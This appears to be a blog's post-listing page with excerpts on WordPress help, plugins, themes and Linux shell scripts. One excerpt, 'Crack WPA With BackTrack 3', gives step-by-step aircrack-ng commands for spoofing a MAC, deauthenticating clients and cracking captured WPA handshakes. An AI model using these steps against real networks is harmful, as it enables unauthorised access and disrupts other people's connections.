• Member Login

    Sign Up !

    Forgot Password ?




Log-in|Register
  • Buy iRedlof Ajax Login v4.0 [WP]

    Add to Cart Buy Now!

Need Help With Your WordPress ?

Anybody out there having problem with your wordpress. For eg: problems like setting up your blog, plugin install, theme install, anything related to coding section, etc can ping me if you want any help from me. Add your question as comment below and i will try my level best to find a solution to your

More...

Posted in Wordpress | 25 Comments

iRedlof Link Checker [WordPress Plugin]

Being a Blogger, you always have to exchange links with other sites and very often have to purchase links from other pages also. In a long term link building process you have to build tens of thousands of links. Do you ever spend time to check whether all your old links which you purchased are

More...

Posted in Wordpress | 12 Comments

[Updated on 01-July-09]:iRedlof Inspire [WordPress Theme] v2.0

Description: An inspiring 2-Coloumn Black, Blue coloured theme tabbed for a revolutionary better browsing style with sidebar tabbed panel and iredlof ajax login plugin ready. Installation: Upload `iRedlofInspire` folder to the `/wp-content/themes/` directory. Upload `plugins` folder inside content (ajax-calendar, etc folders)to the `/wp-content/plugins/` directory Activate the plugin through the ”Plugins” menu in WordPress Activate the

More...

Posted in Wordpress | 11 Comments

Shell Script To Monitor UNIX / Linux Server Disk Space

Shell script to monitor or watch the disk space and send an email alert if the (free avilable) percentage of space is >= 90% #!/bin/sh # Shell script to monitor or watch the disk space # It will send an email to $ADMIN, if the (free avilable) percentage # of space is >= 90% #

More...

Posted in Ubuntu | Leave a comment

Crack WPA With BackTrack 3

How to crack Wifi – WPA with backtrack 3 : Steps : 1. airmon-ng stop wlan0 2. ifconfig wlan0 down 3. macchanger –mac 00:11:22:33:44:55 wlan0 4. airmon-ng start wlan0 5. airodump-ng wlan0 6. airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0 7. aireplay-ng -0 5 -a (bssid)wlan0 8. aircrack-ng (filename-01.cap)-w (dictionary location) 9. and

More...

Posted in Hacking & Cracking | 1 Comment

WP Error – “Error Establishing a Database Connection”

How To Fix “Error Establishing a Database Connection” WordPress Error Part 1 : How To Fix “Error Establishing a Database Connection” WordPress Error Part 2 : Courtesy: http://educhalk.org
Posted in Wordpress | Leave a comment

Shell script to check domain serial numbers across all name servers

#!/bin/bash # Linux shell script to check BIND named domain serial numbers across all name servers # Tested on RHEL, Fedora, Centos and Debian Linux # Requires named-checkzone, host utilities, and BIND server. # ----------------------------------------------------- # This script is licensed under GNU GPL version 2.0 or above # ----------------------------------------------------- # This script is part of

More...

Posted in Ubuntu | Leave a comment

Warning: Using WordPress Can Ban Your Blog From Ping Services

A Warning note for WordPress users, if you are using wordpress for a long time, then by now your blog probably has been banned from ping services and you don”t even know it. Read below to learn how some major flaws in WordPress”s pinging system can get your blog banned and make it lose precious

More...

Posted in Wordpress | 3 Comments

Create WordPress Theme From Scratch Part IV

Part IV : Debugging and Validaton For simplicity’s sake, I’ve made this process a separate part. However, as you work on and develop your own WordPress themes, you will no doubt discover that life will go much smoother if you debug and validate at each step of your theme development process. The full process will

More...

Posted in Wordpress | Leave a comment